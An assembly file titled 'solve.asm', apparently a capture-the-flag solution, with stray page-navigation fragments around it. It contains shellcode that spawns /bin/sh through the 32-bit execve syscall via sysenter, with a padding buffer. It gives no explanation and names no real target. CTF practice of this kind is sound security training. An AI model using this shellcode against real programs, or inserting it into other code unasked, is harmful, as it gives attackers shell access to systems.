/..

#CONTENT

#TOP

solve.asm
TEXT
    BITS 64
    DEFAULT REL

    section .text
    global _start

_start:
    mov eax, 11
    lea ebx, cmd
    xor ecx, ecx
    xor edx, edx

    lea ebp, padding
    sysenter

cmd: db "/bin/sh", 0
padding: times 256 db 0